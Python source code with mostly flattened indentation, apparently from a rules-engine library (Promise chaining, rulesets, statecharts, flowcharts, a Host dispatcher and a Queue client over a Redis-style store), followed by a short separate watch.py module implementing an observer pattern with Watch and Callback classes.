if not ruleset_name:
ruleset_name = self.ruleset_name
if not sid:
sid = self.s.sid
if (ruleset_name == self.ruleset_name) and (sid == self.s.sid):
self._deleted = True
sid_list = []
if ruleset_name in self._delete_directory:
sid_list = self._delete_directory[ruleset_name]
else:
self._delete_directory[ruleset_name] = sid_list
sid_list.append(sid)
def start_timer(self, timer_name, duration, manual_reset = False):
if timer_name in self._timer_directory:
raise Exception('Timer with name {0} already added'.format(timer_name))
else:
timer = {'sid': self.s.sid, '$t': timer_name}
self._timer_directory[timer_name] = (timer, duration, manual_reset)
def cancel_timer(self, timer_name):
if timer_name in self._cancelled_timer_directory:
raise Exception('Timer with name {0} already cancelled'.format(timer_name))
else:
self._cancelled_timer_directory[timer_name] = True
def _retract_timer(self, timer_name, message):
if '$t' in message and message['$t'] == timer_name:
self.retract_fact(message)
return True
for property_name, property_value in message.items():
if isinstance(property_value, dict) and self._retract_timer(timer_name, property_value):
return True
return False
def reset_timer(self, timer_name):
if self._m:
return self._retract_timer(timer_name, self._m)
else:
for message in self.m:
if self._retract_timer(timer_name, message):
return True
return False
def assert_fact(self, ruleset_name, fact = None):
if not fact:
fact = ruleset_name
ruleset_name = self.ruleset_name
if not 'sid' in fact:
fact['sid'] = self.s.sid
if isinstance(fact, Content):
fact = copy.deepcopy(fact._d)
fact_list = []
if ruleset_name in self._fact_directory:
fact_list = self._fact_directory[ruleset_name]
else:
self._fact_directory[ruleset_name] = fact_list
fact_list.append(fact)
def retract_fact(self, ruleset_name, fact = None):
if not fact:
fact = ruleset_name
ruleset_name = self.ruleset_name
if not 'sid' in fact:
fact['sid'] = self.s.sid
if isinstance(fact, Content):
fact = copy.deepcopy(fact._d)
retract_list = []
if ruleset_name in self._retract_directory:
retract_list = self._retract_directory[ruleset_name]
else:
self._retract_directory[ruleset_name] = retract_list
retract_list.append(fact)
def renew_action_lease(self):
if _unix_now() - self._start_time < 10:
self._start_time = _unix_now()
self.host.renew_action_lease(self.ruleset_name, self.s.sid)
def _has_completed(self):
if _unix_now() - self._start_time > 10:
self._completed = True
value = self._completed
self._completed = True
return value
def _is_deleted(self):
return self._deleted
def __getattr__(self, name):
if name == '_m':
return None
if name in self._m:
return Content(self._m[name])
else:
return None
class Content(object):
def items(self):
return self._d.items()
def __init__(self, data):
self._d = data
def __getitem__(self, key):
if key in self._d:
data = self._d[key]
if isinstance(data, dict):
data = Content(data)
return data
else:
return None
def __setitem__(self, key, value):
        if value is None:
del self._d[key]
elif isinstance(value, Content):
self._d[key] = value._d
else:
self._d[key] = value
    def __iter__(self):
        return iter(self._d)
def __contains__(self, key):
return key in self._d
def __getattr__(self, name):
return self.__getitem__(name)
def __setattr__(self, name, value):
if name == '_d':
self.__dict__['_d'] = value
else:
self.__setitem__(name, value)
def __repr__(self):
return repr(self._d)
def __str__(self):
return str(self._d)
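# Illustrative sketch (not part of the original module): Content wraps a plain
# dict so that nested lookups can be written as attribute access. Based on the
# class above, the following behaviour is expected; the variable names are
# hypothetical.
#
#     state = Content({'status': {'code': 200}})
#     state.status.code           # -> 200, nested dicts are wrapped on access
#     state.missing               # -> None, absent keys do not raise KeyError
#     state.status.code = 404     # writes through to the underlying dict
#     'status' in state           # -> True
#     state.status = None         # assigning None deletes the key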
class Promise(object):
def __init__(self, func):
self._func = func
self._next = None
self._sync = True
self._timer = None
self.root = self
arg_count = func.__code__.co_argcount
if inspect.ismethod(func):
arg_count -= 1
if arg_count == 2:
self._sync = False
elif arg_count != 1:
raise Exception('Invalid function signature')
def continue_with(self, next):
if (isinstance(next, Promise)):
self._next = next
elif (hasattr(next, '__call__')):
self._next = Promise(next)
else:
raise Exception('Unexpected Promise Type')
self._next.root = self.root
return self._next
def run(self, c, complete):
def timeout(max_time):
if _unix_now() > max_time:
c.s.exception = 'timeout expired'
complete(None)
else:
c.renew_action_lease()
self._timer = threading.Timer(5, timeout, (max_time, ))
self._timer.daemon = True
self._timer.start()
if self._sync:
try:
self._func(c)
except BaseException as error:
t, v, tb = sys.exc_info()
c.s.exception = 'exception caught {0}, traceback {1}'.format(
str(error), traceback.format_tb(tb))
except:
c.s.exception = 'unknown exception'
if self._next:
self._next.run(c, complete)
else:
complete(None)
else:
try:
def callback(e):
if self._timer:
self._timer.cancel()
self._timer = None
if e:
c.s.exception = str(e)
if self._next:
self._next.run(c, complete)
else:
complete(None)
time_left = self._func(c, callback)
if time_left:
self._timer = threading.Timer(5, timeout, (_unix_now() + time_left, ))
self._timer.daemon = True
self._timer.start()
except BaseException as error:
t, v, tb = sys.exc_info()
c.s.exception = 'exception caught {0}, traceback {1}'.format(
str(error), traceback.format_tb(tb))
complete(None)
except:
c.s.exception = 'unknown exception'
complete(None)
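# Illustrative sketch (not part of the original module): Promise chains action
# functions. A one-argument function is treated as synchronous; a two-argument
# function is treated as asynchronous and must invoke the supplied callback.
# The function and variable names below are hypothetical, and the object passed
# as the closure only needs whatever the chained functions themselves use.
#
#     def first(c):
#         print('first step')
#
#     def second(c, complete):
#         print('second step')
#         complete(None)          # signal completion of the asynchronous step
#
#     chain = Promise(first)
#     chain.continue_with(second)
#     chain.run(object(), lambda e: print('chain finished'))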
class To(Promise):
def __init__(self, from_state, to_state, assert_state):
super(To, self).__init__(self._execute)
self._from_state = from_state
self._to_state = to_state
self._assert_state = assert_state
def _execute(self, c):
c.s.running = True
if self._from_state != self._to_state:
if self._from_state:
if c.m and isinstance(c.m, list):
c.retract_fact(c.m[0].chart_context)
else:
c.retract_fact(c.chart_context)
if self._assert_state:
c.assert_fact({ 'label': self._to_state, 'chart': 1 })
else:
c.post({ 'label': self._to_state, 'chart': 1 })
class Ruleset(object):
def __init__(self, name, host, ruleset_definition, state_cache_size):
self._actions = {}
self._name = name
self._host = host
for rule_name, rule in ruleset_definition.items():
action = rule['run']
del rule['run']
if isinstance(action, str):
self._actions[rule_name] = Promise(host.get_action(action))
elif isinstance(action, Promise):
self._actions[rule_name] = action.root
elif (hasattr(action, '__call__')):
self._actions[rule_name] = Promise(action)
self._handle = rules.create_ruleset(state_cache_size, name, json.dumps(ruleset_definition, ensure_ascii=False))
self._definition = ruleset_definition
def bind(self, databases):
for db in databases:
if isinstance(db, str):
rules.bind_ruleset(0, 0, db, None, self._handle)
else:
if not 'password' in db:
db['password'] = None
if not 'db' in db:
db['db'] = 0
rules.bind_ruleset(db['port'], db['db'], db['host'], db['password'], self._handle)
def assert_event(self, message):
return rules.assert_event(self._handle, json.dumps(message, ensure_ascii=False))
def queue_assert_event(self, sid, ruleset_name, message):
if sid != None:
sid = str(sid)
rules.queue_assert_event(self._handle, sid, ruleset_name, json.dumps(message, ensure_ascii=False))
def start_assert_event(self, message):
return rules.start_assert_event(self._handle, json.dumps(message, ensure_ascii=False))
def assert_events(self, messages):
return rules.assert_events(self._handle, json.dumps(messages, ensure_ascii=False))
def start_assert_events(self, messages):
return rules.start_assert_events(self._handle, json.dumps(messages, ensure_ascii=False))
def assert_fact(self, fact):
return rules.assert_fact(self._handle, json.dumps(fact, ensure_ascii=False))
def queue_assert_fact(self, sid, ruleset_name, message):
if sid != None:
sid = str(sid)
rules.queue_assert_fact(self._handle, sid, ruleset_name, json.dumps(message, ensure_ascii=False))
def start_assert_fact(self, fact):
return rules.start_assert_fact(self._handle, json.dumps(fact, ensure_ascii=False))
def assert_facts(self, facts):
return rules.assert_facts(self._handle, json.dumps(facts, ensure_ascii=False))
def start_assert_facts(self, facts):
return rules.start_assert_facts(self._handle, json.dumps(facts, ensure_ascii=False))
def retract_fact(self, fact):
return rules.retract_fact(self._handle, json.dumps(fact, ensure_ascii=False))
def queue_retract_fact(self, sid, ruleset_name, message):
if sid != None:
sid = str(sid)
rules.queue_retract_fact(self._handle, sid, ruleset_name, json.dumps(message, ensure_ascii=False))
def start_retract_fact(self, fact):
return rules.start_retract_fact(self._handle, json.dumps(fact, ensure_ascii=False))
def retract_facts(self, facts):
return rules.retract_facts(self._handle, json.dumps(facts, ensure_ascii=False))
def start_retract_facts(self, facts):
return rules.start_retract_facts(self._handle, json.dumps(facts, ensure_ascii=False))
def start_timer(self, sid, timer, timer_duration, manual_reset):
if sid != None:
sid = str(sid)
rules.start_timer(self._handle, timer_duration, manual_reset, json.dumps(timer, ensure_ascii=False), sid)
def cancel_timer(self, sid, timer_name):
if sid != None:
sid = str(sid)
rules.cancel_timer(self._handle, sid, timer_name)
def assert_state(self, state):
if 'sid' in state:
return rules.assert_state(self._handle, str(state['sid']), json.dumps(state, ensure_ascii=False))
else:
return rules.assert_state(self._handle, None, json.dumps(state, ensure_ascii=False))
def get_state(self, sid):
if sid != None:
sid = str(sid)
return json.loads(rules.get_state(self._handle, sid))
def delete_state(self, sid):
if sid != None:
sid = str(sid)
rules.delete_state(self._handle, sid)
def renew_action_lease(self, sid):
if sid != None:
sid = str(sid)
rules.renew_action_lease(self._handle, sid)
def get_definition(self):
return self._definition
@staticmethod
def create_rulesets(parent_name, host, ruleset_definitions, state_cache_size):
branches = {}
for name, definition in ruleset_definitions.items():
if name.rfind('$state') != -1:
name = name[:name.rfind('$state')]
if parent_name:
name = '{0}.{1}'.format(parent_name, name)
branches[name] = Statechart(name, host, definition, state_cache_size)
elif name.rfind('$flow') != -1:
name = name[:name.rfind('$flow')]
if parent_name:
name = '{0}.{1}'.format(parent_name, name)
branches[name] = Flowchart(name, host, definition, state_cache_size)
else:
if parent_name:
name = '{0}.{1}'.format(parent_name, name)
branches[name] = Ruleset(name, host, definition, state_cache_size)
return branches
def dispatch_timers(self, complete):
try:
if not rules.assert_timers(self._handle):
complete(None, True)
else:
complete(None, False)
except Exception as error:
complete(error, True)
return
def dispatch(self, complete, async_result = None):
state = None
action_handle = None
action_binding = None
result_container = {}
if async_result:
state = async_result[0]
result_container = {'message': json.loads(async_result[1])}
action_handle = async_result[2]
action_binding = async_result[3]
else:
try:
result = rules.start_action(self._handle)
if not result:
complete(None, True)
return
else:
state = json.loads(result[0])
result_container = {'message': json.loads(result[1])}
action_handle = result[2]
action_binding = result[3]
except BaseException as error:
t, v, tb = sys.exc_info()
print('start action base exception type {0}, value {1}, traceback {2}'.format(t, str(v), traceback.format_tb(tb)))
complete(error, True)
return
except:
t, v, tb = sys.exc_info()
print('start action unknown exception type {0}, value {1}, traceback {2}'.format(t, str(v), traceback.format_tb(tb)))
complete('unknown error', True)
return
while 'message' in result_container:
action_name = None
for action_name, message in result_container['message'].items():
break
del(result_container['message'])
c = Closure(self._host, state, message, action_handle, self._name)
def action_callback(e):
if c._has_completed():
return
if e:
rules.abandon_action(self._handle, c._handle)
complete(e, True)
else:
try:
for timer_name, timer in c.get_cancelled_timers().items():
self.cancel_timer(c.s['sid'], timer_name)
for timer_id, timer_tuple in c.get_timers().items():
self.start_timer(c.s['sid'], timer_tuple[0], timer_tuple[1], timer_tuple[2])
for ruleset_name, q in c.get_queues().items():
for message in q.get_queued_posts():
self.queue_assert_event(message['sid'], ruleset_name, message)
for message in q.get_queued_asserts():
self.queue_assert_fact(message['sid'], ruleset_name, message)
for message in q.get_queued_retracts():
self.queue_retract_fact(message['sid'], ruleset_name, message)
for ruleset_name, sid in c.get_deletes().items():
self._host.delete_state(ruleset_name, sid)
binding = 0
replies = 0
pending = {action_binding: 0}
for ruleset_name, facts in c.get_retract_facts().items():
if len(facts) == 1:
binding, replies = self._host.start_retract_fact(ruleset_name, facts[0])
else:
binding, replies = self._host.start_retract_facts(ruleset_name, facts)
if binding in pending:
pending[binding] = pending[binding] + replies
else:
pending[binding] = replies
for ruleset_name, facts in c.get_facts().items():
if len(facts) == 1:
binding, replies = self._host.start_assert_fact(ruleset_name, facts[0])
else:
binding, replies = self._host.start_assert_facts(ruleset_name, facts)
if binding in pending:
pending[binding] = pending[binding] + replies
else:
pending[binding] = replies
for ruleset_name, messages in c.get_messages().items():
if len(messages) == 1:
binding, replies = self._host.start_post(ruleset_name, messages[0])
else:
binding, replies = self._host.start_post_batch(ruleset_name, messages)
if binding in pending:
pending[binding] = pending[binding] + replies
else:
pending[binding] = replies
binding, replies = rules.start_update_state(self._handle, c._handle, json.dumps(c.s._d, ensure_ascii=False))
if binding in pending:
pending[binding] = pending[binding] + replies
else:
pending[binding] = replies
for binding, replies in pending.items():
if binding != 0:
if binding != action_binding:
rules.complete(binding, replies)
else:
new_result = rules.complete_and_start_action(self._handle, replies, c._handle)
if new_result:
if 'async' in result_container:
def terminal(e, wait):
return
self.dispatch(terminal, [state, new_result, action_handle, action_binding])
else:
result_container['message'] = json.loads(new_result)
except BaseException as error:
t, v, tb = sys.exc_info()
print('base exception type {0}, value {1}, traceback {2}'.format(t, str(v), traceback.format_tb(tb)))
rules.abandon_action(self._handle, c._handle)
complete(error, True)
                    except:
                        t, v, tb = sys.exc_info()
                        print('unknown exception type {0}, value {1}, traceback {2}'.format(t, str(v), traceback.format_tb(tb)))
rules.abandon_action(self._handle, c._handle)
complete('unknown error', True)
if c._is_deleted():
try:
self.delete_state(c.s.sid)
except BaseException as error:
complete(error, True)
if 'async' in result_container:
del result_container['async']
self._actions[action_name].run(c, action_callback)
result_container['async'] = True
complete(None, False)
class Statechart(Ruleset):
def __init__(self, name, host, chart_definition, state_cache_size):
self._name = name
self._host = host
ruleset_definition = {}
self._transform(None, None, None, chart_definition, ruleset_definition)
super(Statechart, self).__init__(name, host, ruleset_definition, state_cache_size)
self._definition = chart_definition
self._definition['$type'] = 'stateChart'
def _transform(self, parent_name, parent_triggers, parent_start_state, chart_definition, rules):
start_state = {}
reflexive_states = {}
for state_name, state in chart_definition.items():
qualified_name = state_name
if parent_name:
qualified_name = '{0}.{1}'.format(parent_name, state_name)
start_state[qualified_name] = True
for trigger_name, trigger in state.items():
if ('to' in trigger and trigger['to'] == state_name) or 'count' in trigger or 'cap' in trigger:
reflexive_states[qualified_name] = True
for state_name, state in chart_definition.items():
qualified_name = state_name
if parent_name:
qualified_name = '{0}.{1}'.format(parent_name, state_name)
triggers = {}
if parent_triggers:
for parent_trigger_name, trigger in parent_triggers.items():
triggers['{0}.{1}'.format(qualified_name, parent_trigger_name)] = trigger
for trigger_name, trigger in state.items():
if trigger_name != '$chart':
if ('to' in trigger) and parent_name:
trigger['to'] = '{0}.{1}'.format(parent_name, trigger['to'])
triggers['{0}.{1}'.format(qualified_name, trigger_name)] = trigger
if '$chart' in state:
self._transform(qualified_name, triggers, start_state, state['$chart'], rules)
else:
for trigger_name, trigger in triggers.items():
rule = {}
state_test = {'chart_context': {'$and':[{'label': qualified_name}, {'chart': 1}]}}
if 'pri' in trigger:
rule['pri'] = trigger['pri']
if 'count' in trigger:
rule['count'] = trigger['count']
if 'cap' in trigger:
rule['cap'] = trigger['cap']
if 'all' in trigger:
rule['all'] = list(trigger['all'])
rule['all'].append(state_test)
elif 'any' in trigger:
rule['all'] = [state_test, {'m$any': trigger['any']}]
else:
rule['all'] = [state_test]
if 'run' in trigger:
if isinstance(trigger['run'], str):
rule['run'] = Promise(self._host.get_action(trigger['run']))
elif isinstance(trigger['run'], Promise):
rule['run'] = trigger['run']
elif hasattr(trigger['run'], '__call__'):
rule['run'] = Promise(trigger['run'])
if 'to' in trigger:
from_state = None
if qualified_name in reflexive_states:
from_state = qualified_name
to_state = trigger['to']
assert_state = False
if to_state in reflexive_states:
assert_state = True
if 'run' in rule:
rule['run'].continue_with(To(from_state, to_state, assert_state))
else:
rule['run'] = To(from_state, to_state, assert_state)
if to_state in start_state:
del start_state[to_state]
if parent_start_state and to_state in parent_start_state:
del parent_start_state[to_state]
else:
raise Exception('Trigger {0} destination not defined'.format(trigger_name))
rules[trigger_name] = rule;
started = False
for state_name in start_state.keys():
if started:
raise Exception('Chart {0} has more than one start state {1}'.format(self._name, state_name))
started = True
if parent_name:
rules[parent_name + '$start'] = {'all':[{'chart_context': {'$and': [{'label': parent_name}, {'chart':1}]}}], 'run': To(None, state_name, False)};
else:
rules['$start'] = {'all': [{'chart_context': {'$and': [{'$nex': {'running': 1}}, {'$s': 1}]}}], 'run': To(None, state_name, False)};
if not started:
raise Exception('Chart {0} has no start state'.format(self._name))
class Flowchart(Ruleset):
def __init__(self, name, host, chart_definition, state_cache_size):
self._name = name
self._host = host
ruleset_definition = {}
self._transform(chart_definition, ruleset_definition)
super(Flowchart, self).__init__(name, host, ruleset_definition, state_cache_size)
self._definition = chart_definition
self._definition['$type'] = 'flowChart'
def _transform(self, chart_definition, rules):
visited = {}
reflexive_stages = {}
for stage_name, stage in chart_definition.items():
if 'to' in stage:
if isinstance(stage['to'], str):
if stage['to'] == stage_name:
reflexive_stages[stage_name] = True
else:
for transition_name, transition in stage['to'].items():
if transition_name == stage_name or 'count' in transition or 'cap' in transition:
reflexive_stages[stage_name] = True
for stage_name, stage in chart_definition.items():
stage_test = {'chart_context': {'$and':[{'label': stage_name}, {'chart':1}]}}
from_stage = None
if stage_name in reflexive_stages:
from_stage = stage_name
if 'to' in stage:
if isinstance(stage['to'], str):
next_stage = None
rule = {'all': [stage_test]}
if stage['to'] in chart_definition:
next_stage = chart_definition[stage['to']]
else:
raise Exception('Stage {0} not found'.format(stage['to']))
assert_stage = False
if stage['to'] in reflexive_stages:
assert_stage = True
if not 'run' in next_stage:
rule['run'] = To(from_stage, stage['to'], assert_stage)
else:
if isinstance(next_stage['run'], str):
rule['run'] = To(from_stage, stage['to'], assert_stage).continue_with(Promise(self._host.get_action(next_stage['run'])))
elif isinstance(next_stage['run'], Promise) or hasattr(next_stage['run'], '__call__'):
rule['run'] = To(from_stage, stage['to'], assert_stage).continue_with(next_stage['run'])
rules['{0}.{1}'.format(stage_name, stage['to'])] = rule
visited[stage['to']] = True
else:
for transition_name, transition in stage['to'].items():
rule = {}
next_stage = None
if 'pri' in transition:
rule['pri'] = transition['pri']
if 'count' in transition:
rule['count'] = transition['count']
if 'cap' in transition:
rule['cap'] = transition['cap']
if 'all' in transition:
rule['all'] = list(transition['all'])
rule['all'].append(stage_test)
elif 'any' in transition:
rule['all'] = [stage_test, {'m$any': transition['any']}]
else:
rule['all'] = [stage_test]
if transition_name in chart_definition:
next_stage = chart_definition[transition_name]
else:
raise Exception('Stage {0} not found'.format(transition_name))
assert_stage = False
if transition_name in reflexive_stages:
assert_stage = True
if not 'run' in next_stage:
rule['run'] = To(from_stage, transition_name, assert_stage)
else:
if isinstance(next_stage['run'], str):
rule['run'] = To(from_stage, transition_name, assert_stage).continue_with(Promise(self._host.get_action(next_stage['run'])))
elif isinstance(next_stage['run'], Promise) or hasattr(next_stage['run'], '__call__'):
rule['run'] = To(from_stage, transition_name, assert_stage).continue_with(next_stage['run'])
rules['{0}.{1}'.format(stage_name, transition_name)] = rule
visited[transition_name] = True
started = False
for stage_name, stage in chart_definition.items():
if not stage_name in visited:
if started:
raise Exception('Chart {0} has more than one start state'.format(self._name))
rule = {'all': [{'chart_context': {'$and': [{'$nex': {'running': 1}}, {'$s': 1}]}}]}
if not 'run' in stage:
rule['run'] = To(None, stage_name, False)
else:
if isinstance(stage['run'], str):
rule['run'] = To(None, stage_name, False).continue_with(Promise(self._host.get_action(stage['run'])))
elif isinstance(stage['run'], Promise) or hasattr(stage['run'], '__call__'):
rule['run'] = To(None, stage_name, False).continue_with(stage['run'])
rules['$start.{0}'.format(stage_name)] = rule
started = True
class Host(object):
def __init__(self, ruleset_definitions = None, databases = None, state_cache_size = 1024):
if not databases:
databases = [{'host': 'localhost', 'port': 6379, 'password': None, 'db': 0}]
self._ruleset_directory = {}
self._ruleset_list = []
self._databases = databases
self._state_cache_size = state_cache_size
if ruleset_definitions:
self.register_rulesets(None, ruleset_definitions)
def get_action(self, action_name):
raise Exception('Action with name {0} not found'.format(action_name))
def load_ruleset(self, ruleset_name):
raise Exception('Ruleset with name {0} not found'.format(ruleset_name))
def save_ruleset(self, ruleset_name, ruleset_definition):
return
def get_ruleset(self, ruleset_name):
if ruleset_name in self._ruleset_directory:
return self._ruleset_directory[ruleset_name]
else:
ruleset_definition = self.load_ruleset(ruleset_name)
self.register_rulesets(None, ruleset_definition)
return self._ruleset_directory[ruleset_name]
def set_ruleset(self, ruleset_name, ruleset_definition):
self.register_rulesets(None, ruleset_definition)
self.save_ruleset(ruleset_name, ruleset_definition)
def get_state(self, ruleset_name, sid):
return self.get_ruleset(ruleset_name).get_state(sid)
def delete_state(self, ruleset_name, sid):
self.get_ruleset(ruleset_name).delete_state(sid)
def post_batch(self, ruleset_name, messages):
return self.get_ruleset(ruleset_name).assert_events(messages)
def start_post_batch(self, ruleset_name, messages):
return self.get_ruleset(ruleset_name).start_assert_events(messages)
def post(self, ruleset_name, message):
if isinstance(message, list):
return self.post_batch(ruleset_name, message)
return self.get_ruleset(ruleset_name).assert_event(message)
def start_post(self, ruleset_name, message):
if isinstance(message, list):
return self.start_post_batch(ruleset_name, message)
return self.get_ruleset(ruleset_name).start_assert_event(message)
def assert_fact(self, ruleset_name, fact):
if isinstance(fact, list):
return self.assert_facts(ruleset_name, fact)
return self.get_ruleset(ruleset_name).assert_fact(fact)
def start_assert_fact(self, ruleset_name, fact):
if isinstance(fact, list):
return self.start_assert_facts(ruleset_name, fact)
return self.get_ruleset(ruleset_name).start_assert_fact(fact)
def assert_facts(self, ruleset_name, facts):
return self.get_ruleset(ruleset_name).assert_facts(facts)
def start_assert_facts(self, ruleset_name, facts):
return self.get_ruleset(ruleset_name).start_assert_facts(facts)
def retract_fact(self, ruleset_name, fact):
return self.get_ruleset(ruleset_name).retract_fact(fact)
def start_retract_fact(self, ruleset_name, fact):
return self.get_ruleset(ruleset_name).start_retract_fact(fact)
def retract_facts(self, ruleset_name, facts):
return self.get_ruleset(ruleset_name).retract_facts(facts)
def start_retract_facts(self, ruleset_name, facts):
return self.get_ruleset(ruleset_name).start_retract_facts(facts)
def patch_state(self, ruleset_name, state):
return self.get_ruleset(ruleset_name).assert_state(state)
def renew_action_lease(self, ruleset_name, sid):
self.get_ruleset(ruleset_name).renew_action_lease(sid)
def register_rulesets(self, parent_name, ruleset_definitions):
rulesets = Ruleset.create_rulesets(parent_name, self, ruleset_definitions, self._state_cache_size)
for ruleset_name, ruleset in rulesets.items():
if ruleset_name in self._ruleset_directory:
raise Exception('Ruleset with name {0} already registered'.format(ruleset_name))
else:
self._ruleset_directory[ruleset_name] = ruleset
self._ruleset_list.append(ruleset)
ruleset.bind(self._databases)
return list(rulesets.keys())
def run(self):
def dispatch_ruleset(index, wait):
def callback(e, w):
inner_wait = wait
if e:
if str(e).find('306') == -1:
print('Exiting {0}'.format(str(e)))
os._exit(1)
elif not w:
inner_wait = False
if (index == (len(self._ruleset_list) -1)) and inner_wait:
self._d_timer = threading.Timer(0.25, dispatch_ruleset, ((index + 1) % len(self._ruleset_list), inner_wait, ))
self._d_timer.daemon = True
self._d_timer.start()
else:
self._d_timer = threading.Thread(target = dispatch_ruleset, args = ((index + 1) % len(self._ruleset_list), inner_wait, ))
self._d_timer.daemon = True
self._d_timer.start()
if not len(self._ruleset_list):
self._d_timer = threading.Timer(0.5, dispatch_ruleset, (0, False, ))
self._d_timer.daemon = True
self._d_timer.start()
else:
ruleset = self._ruleset_list[index]
if not index:
wait = True
ruleset.dispatch(callback)
def dispatch_timers(index, wait):
def callback(e, w):
inner_wait = wait
if e:
print('Error {0}'.format(str(e)))
elif not w:
inner_wait = False
if (index == (len(self._ruleset_list) -1)) and inner_wait:
self._t_timer = threading.Timer(0.25, dispatch_timers, ((index + 1) % len(self._ruleset_list), inner_wait, ))
self._t_timer.daemon = True
self._t_timer.start()
else:
self._t_timer = threading.Thread(target = dispatch_timers, args = ((index + 1) % len(self._ruleset_list), inner_wait, ))
self._t_timer.daemon = True
self._t_timer.start()
if not len(self._ruleset_list):
self._t_timer = threading.Timer(0.5, dispatch_timers, (0, False, ))
self._t_timer.daemon = True
self._t_timer.start()
else:
ruleset = self._ruleset_list[index]
if not index:
wait = True
ruleset.dispatch_timers(callback)
self._d_timer = threading.Timer(0.1, dispatch_ruleset, (0, False, ))
self._d_timer.daemon = True
self._d_timer.start()
self._t_timer = threading.Timer(0.1, dispatch_timers, (0, False, ))
self._t_timer.daemon = True
self._t_timer.start()
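# Illustrative sketch (not part of the original module): get_action and
# load_ruleset raise by default, so a concrete host is expected to subclass
# Host and override them. The class and attribute names below are hypothetical,
# and actually running rulesets still requires the `rules` extension and a
# reachable database as configured in Host.__init__.
#
#     class DictionaryHost(Host):
#         def __init__(self, actions, ruleset_definitions=None):
#             self._named_actions = actions   # e.g. {'approve': approve_fn}
#             super(DictionaryHost, self).__init__(ruleset_definitions)
#
#         def get_action(self, action_name):
#             try:
#                 return self._named_actions[action_name]
#             except KeyError:
#                 return super(DictionaryHost, self).get_action(action_name)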
class Queue(object):
def __init__(self, ruleset_name, database = None, state_cache_size = 1024):
if not database:
database = {'host': 'localhost', 'port': 6379, 'password':None, 'db': 0}
self._ruleset_name = ruleset_name
self._handle = rules.create_client(state_cache_size, ruleset_name)
if isinstance(database, str):
rules.bind_ruleset(0, 0, database, None, self._handle)
else:
if not 'password' in database:
database['password'] = None
if not 'db' in database:
database['db'] = 0
rules.bind_ruleset(database['port'], database['db'], database['host'], database['password'], self._handle)
def isClosed(self):
return self._handle == 0
def post(self, message):
if self._handle == 0:
raise Exception('Queue has already been closed')
if 'sid' in message:
rules.queue_assert_event(self._handle, str(message['sid']), self._ruleset_name, json.dumps(message, ensure_ascii=False))
else:
rules.queue_assert_event(self._handle, None, self._ruleset_name, json.dumps(message, ensure_ascii=False))
def assert_fact(self, message):
if self._handle == 0:
raise Exception('Queue has already been closed')
if 'sid' in message:
rules.queue_assert_fact(self._handle, str(message['sid']), self._ruleset_name, json.dumps(message, ensure_ascii=False))
else:
rules.queue_assert_fact(self._handle, None, self._ruleset_name, json.dumps(message, ensure_ascii=False))
def retract_fact(self, message):
if self._handle == 0:
raise Exception('Queue has already been closed')
if 'sid' in message:
rules.queue_retract_fact(self._handle, str(message['sid']), self._ruleset_name, json.dumps(message, ensure_ascii=False))
else:
rules.queue_retract_fact(self._handle, None, self._ruleset_name, json.dumps(message, ensure_ascii=False))
def close(self):
if self._handle != 0:
rules.delete_client(self._handle)
self._handle = 0
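# Illustrative sketch (not part of the original module): Queue is a lightweight
# client for enqueueing events and facts into a named ruleset without hosting
# the ruleset itself. It assumes the `rules` extension and the bound database
# (Redis on localhost:6379 by default) are available; the ruleset name and
# messages below are hypothetical.
#
#     q = Queue('approval')
#     q.post({'sid': '1', 'subject': 'approve', 'amount': 100})
#     q.assert_fact({'sid': '1', 'subject': 'balance', 'amount': 500})
#     q.retract_fact({'sid': '1', 'subject': 'balance', 'amount': 500})
#     q.close()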
|
watch.py
|
from threading import Thread
class Watch:
""" Watch class to implement a data-observer pattern on the encapsulated data item.
        The event-handlers/callbacks will be run when the data is changed/set. """
def __init__(self, data=None):
""" Pass constructor the data item to be watched. None by default """
self.__data = data
# Create 2 Callback objects to store all the callback functions
self.on_set = Callback()
self.on_change = Callback()
# Decorated Method to use as an attribute to get watched/stored data
@property
def value(self):
return self.__data
# Method to set a value to the data variable watched by this class
def set(self, data):
        # If set is called and the data value has changed, save the data and run the on_change callbacks
        if data != self.__data: # Equality check, so in-place mutations of the same object reference will not be detected
self.__data = data
# Run all the on_change callback functions
self.__event(self.on_change)
# Always run all the on_set callback functions when set method called
self.__event(self.on_set)
        # Return self reference to allow method call chaining.
return self
# Method to remove all the Callbacks associated with the data
def clearAllListeners(self):
self.on_set.clear()
self.on_change.clear()
# Static Decorator function that wraps original function in try/except block
@staticmethod
def fn_wrapper(fn):
""" Callbacks are not wrapped on saving them into Callback Class objects because
when wrapped, their reference changes, and thus making it unable to be removed
from the list of callbacks using the reference to the original function.
Thus the wrapper should only be applied just before running the functions.
"""
# Define the inner wrapper function
def wrapped_fn(*args, **kwargs):
try:
                # Try to call the original callback function with the arguments
fn(*args, **kwargs)
except TypeError:
                # If the function does not accept the arguments, call it without any
fn()
# Below is alternative fn call with kwargs
# fn(**kwargs)
except:
# If the exception raised is not a TypeError, log it out
print('ERR: Unknown exception raised when calling callback function')
# Return the wrapped function back
return wrapped_fn
# "Hidden" method that is called when the data is changed, to run all the given callbacks in seperate threads
def __event(self, callbacks):
        # Loop through and run all the callbacks in separate threads
for cb in callbacks:
# The thread is used to run the wrapped function
Thread(target=self.fn_wrapper(cb), daemon=True, args=(self.__data,)).start()
# Method to return the string representation when str(obj) called
def __str__(self):
# 2 different ways to get the string representation.
        # Method 1 is better for objects that define their own string representation
return str(self.__data)
# Method 2 better for primitive data types
# return '{}'.format(self.__data)
    # Allow the user to see the data when evaluating w directly (e.g. at the REPL) instead of w.value, where w = Watch(1)
    def __repr__(self):
        return repr(self.__data)
# Allow user to do w(5) to pass set method the value 5, where w = Watch(1)
__call__ = set
class Callback:
"""
    For the 'append' and 'remove' methods:
    returning self is NEEDED to allow the user to write "data.on_set += new_cb".
    This is because "+=" rebinds the attribute to the method's return value, so if nothing
    were returned, the on_set attribute of the data object would be overwritten with None
    instead of the Callback object that now contains new_cb.
"""
def __init__(self, cbs=None):
""" Able to accept pre-constructed lists of callback functions """
        if cbs is None:
# Create an empty list for this Callback object if none given
self.__cbs = []
else:
self.__cbs = cbs
# Method to get the callback-function list out from the object
@property
def get(self):
return self.__cbs
# Method to append data/callback-functions into the list
def append(self, cb):
if isinstance(cb, tuple):
for callback in cb:
self.__cbs.append(callback)
else:
self.__cbs.append(cb)
        # Return self reference to allow method call chaining.
return self
# Method to remove data/callback-functions from the list
def remove(self, cb):
try:
self.__cbs.remove(cb)
except ValueError:
print('Invalid callback reference received for removing from "Callback" object!')
raise # Re-raise the Exception to print stack traceback and stop program execution
        # Return self reference to allow method call chaining.
return self
# Method to clear all callback-functions from the list
def clear(self):
self.__cbs.clear()
        # Return self reference to allow method call chaining.
return self
